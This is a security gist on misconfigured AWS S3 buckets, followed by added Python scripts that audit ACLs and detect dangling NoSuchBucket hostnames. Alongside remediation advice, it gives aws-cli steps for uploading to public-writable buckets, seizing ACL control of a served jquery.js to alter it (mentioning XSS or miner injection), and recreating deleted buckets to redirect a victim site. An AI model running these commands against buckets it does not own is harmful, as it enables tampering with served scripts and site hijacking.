@random-robbie
Last active October 4, 2021 01:10
If you are reading this, then there is a chance you have a poc.txt file in your S3 bucket.

This is just a little heads-up that attackers can upload and overwrite files in your S3 bucket, and if you are serving files like JS from it they can add an XSS payload or a Coinhive miner to your JS.

Log in to your AWS console, find the bucket and remove the public-write permission from it; this fixes the issue.

How to test an S3 bucket for bad permissions

You will need the AWS CLI installed and configured!

aws s3api get-bucket-acl --bucket bucketname

If you see a grant like the following in the output then you have problems!

{
    "Grants": [
        {
            "Grantee": {
                "Type": "Group",
                "URI": "http://acs.amazonaws.com/groups/global/AllUsers"
            },
            "Permission": "FULL_CONTROL"
        }
    ]
}

Log in to your AWS console and remove the public-write permission ASAP.

How to upload a PoC to a bucket

aws s3 cp poc.txt s3://bucketname/ --region us-east-2 --acl public-read

Change the region if the bucket is not in us-east-2.

If you see an error, the bucket does not allow public uploads.

Bad Object Permissions Hijack

On rare occasions you can test individual files for AllUsers control. This means the bucket is not writable but the file is!

You can find this out with:

aws s3api get-object-acl --bucket bucketname --key jquery.js

If you see AllUsers with FULL_CONTROL then you can overwrite this file!!

To do this you need to run the following command:

aws s3api put-object-acl --bucket bucketname --key jquery.js --grant-full-control emailaddress=YOURAWSEMAILADDRESS --grant-write uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers

Now all you do is download the file, alter it and re-upload it:

aws s3 cp jquery.js s3://bucketname/jquery.js --region us-east-2 --acl public-read
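Both the bucket-ACL check above ("How to test an S3 bucket for bad permissions") and the object-ACL check in this section produce the same Grants JSON, so one audit script covers both. The following is an added example, not part of the gist: it reads the output of `aws s3api get-bucket-acl` or `aws s3api get-object-acl` on stdin, flags every grant to the AllUsers or AuthenticatedUsers groups (the group URIs are the real S3 ones), and prints the aws-cli commands that reset the ACL to private and turn on Block Public Access. The sample ACL embedded in the script is constructed to match the shape quoted in the gist, with a normal owner grant added so the document is complete.

```python
"""Audit an S3 ACL (bucket or object) for grants to the public groups.

Usage with the AWS CLI (reads the JSON the CLI prints on stdin):
    aws s3api get-bucket-acl --bucket bucketname | python3 s3_acl_audit.py
    aws s3api get-object-acl --bucket bucketname --key jquery.js | python3 s3_acl_audit.py
Run with no stdin to see the result on the constructed sample ACL below.
"""
import json
import sys

# The two "everyone" grantees that S3 defines (real group URIs).
PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "AllUsers (anyone on the internet)",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "AuthenticatedUsers (any AWS account)",
}

# Permissions that let the grantee change content or the ACL itself.
WRITE_LIKE = {"WRITE", "WRITE_ACP", "FULL_CONTROL"}


def find_public_grants(acl):
    """Return (group_label, permission, severity) for every grant made to
    AllUsers or AuthenticatedUsers in a get-bucket-acl / get-object-acl dict."""
    findings = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") != "Group":
            continue  # canonical users and e-mail grantees are not "everyone"
        label = PUBLIC_GROUPS.get(grantee.get("URI"))
        if label is None:
            continue  # e.g. the LogDelivery group, not a public grantee
        permission = grant.get("Permission", "")
        severity = "CRITICAL" if permission in WRITE_LIKE else "WARNING"
        findings.append((label, permission, severity))
    return findings


def remediation_commands(bucket, key=None):
    """aws-cli commands that reset the ACL to private and, for a bucket,
    enable Block Public Access so public ACLs are ignored from then on."""
    if key:
        return [f"aws s3api put-object-acl --bucket {bucket} --key {key} --acl private"]
    return [
        f"aws s3api put-bucket-acl --bucket {bucket} --acl private",
        f"aws s3api put-public-access-block --bucket {bucket} "
        "--public-access-block-configuration "
        "BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true",
    ]


# Constructed sample ACL (owner ID is a placeholder) in the shape the gist quotes.
SAMPLE_ACL = {
    "Owner": {"ID": "EXAMPLE-OWNER-ID"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "EXAMPLE-OWNER-ID"},
         "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group",
                     "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
         "Permission": "FULL_CONTROL"},
    ],
}


def main():
    acl = SAMPLE_ACL if sys.stdin.isatty() else json.load(sys.stdin)
    findings = find_public_grants(acl)
    if not findings:
        print("OK: no grants to AllUsers or AuthenticatedUsers")
        return 0
    for label, permission, severity in findings:
        print(f"{severity}: {permission} granted to {label}")
    print("Suggested fix (substitute your bucket name, and --key for an object ACL):")
    for cmd in remediation_commands("bucketname"):
        print("  " + cmd)
    return 1


if __name__ == "__main__":
    sys.exit(main())
```

The exit status is 1 whenever a public grant is found, so the script can sit in a cron job or CI step that loops over `aws s3api list-buckets` output and fails loudly when a bucket regresses to public-write.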

Subdomain takeover / Redirect

Sometimes when you visit a website you might see NoSuchBucket, which means the S3 bucket that held the files for that site has been deleted. You can easily hijack this by creating the bucket.

Create the Bucket

aws s3api create-bucket --bucket bucketname --acl public-read --region us-east-1

redirect.json

{
    "RedirectAllRequestsTo": {
        "HostName": "takeover.xsses.rocks"
    }
}

Change the hostname to your takeover page.

aws s3api put-bucket-website --bucket bucketname --website-configuration file://redirect.json

The website will now redirect to your webpage.
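The condition this section relies on, a hostname that still points at S3 but whose bucket is gone, is something you can check for in your own DNS records before someone else does. The following is an added example, not part of the gist: it classifies an HTTP response as S3's NoSuchBucket error document (the `<Code>` and `<BucketName>` element names are the real ones S3 uses) and wraps that in a fetch for each hostname you pass on the command line. The sample response embedded in the script is constructed; `example-static-site` is a made-up bucket name.

```python
"""Check hostnames you own for dangling CNAMEs to deleted S3 buckets.

    python3 s3_dangling_check.py assets.example.com static.example.com

A host that still resolves to an S3 endpoint but whose bucket no longer
exists answers 404 with S3's NoSuchBucket error document. Fix is to
delete the DNS record or recreate the bucket in your own account.
"""
import re
import sys
import urllib.error
import urllib.request

NOSUCHBUCKET_RE = re.compile(r"<Code>\s*NoSuchBucket\s*</Code>")
BUCKET_NAME_RE = re.compile(r"<BucketName>\s*([^<]+?)\s*</BucketName>")


def classify_s3_response(status, headers, body):
    """Return ("dangling", bucket_name) for S3's NoSuchBucket error,
    ("s3-ok", None) for any other answer from S3, and ("not-s3", None)
    when the Server header shows the host is not served by S3 at all."""
    server = {k.lower(): v for k, v in headers.items()}.get("server", "")
    if "AmazonS3" not in server:
        return ("not-s3", None)
    if status == 404 and NOSUCHBUCKET_RE.search(body):
        m = BUCKET_NAME_RE.search(body)
        return ("dangling", m.group(1) if m else None)
    return ("s3-ok", None)


def check_host(hostname, timeout=10):
    """Fetch http://hostname/ and classify the answer (network access needed)."""
    req = urllib.request.Request(f"http://{hostname}/",
                                 headers={"User-Agent": "s3-dangling-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify_s3_response(resp.status, dict(resp.headers.items()),
                                        resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as e:
        # 404 arrives here; the body still carries the S3 error document.
        return classify_s3_response(e.code, dict(e.headers.items()),
                                    e.read().decode("utf-8", "replace"))
    except (urllib.error.URLError, OSError):
        return ("unreachable", None)


# Constructed sample of the error document S3 returns for a missing bucket.
SAMPLE_HEADERS = {"Server": "AmazonS3", "Content-Type": "application/xml"}
SAMPLE_BODY = """<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message>
<BucketName>example-static-site</BucketName><RequestId>EXAMPLE</RequestId></Error>"""


def main(hostnames):
    worst = 0
    for host in hostnames:
        state, bucket = check_host(host)
        print(f"{host}: {state}" + (f" (bucket {bucket})" if bucket else ""))
        if state == "dangling":
            worst = 1
    return worst


if __name__ == "__main__":
    sys.exit(main(sys.argv[1:]))
```

Only the DNS records you control belong in the input list; the useful output is a non-zero exit status on any "dangling" host, which is the signal to remove the record or claim the bucket back yourself.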

Download a file from an S3 bucket

Change mybucket and the file to whatever you want and this will download the file to your /tmp/ folder.

aws s3 cp s3://mybucket/one-central/js/qa.js /tmp/

Download everything in a bucket

This will clone everything you have permission to view onto your machine.

aws s3 sync s3://mybucket /tmp/mybucket/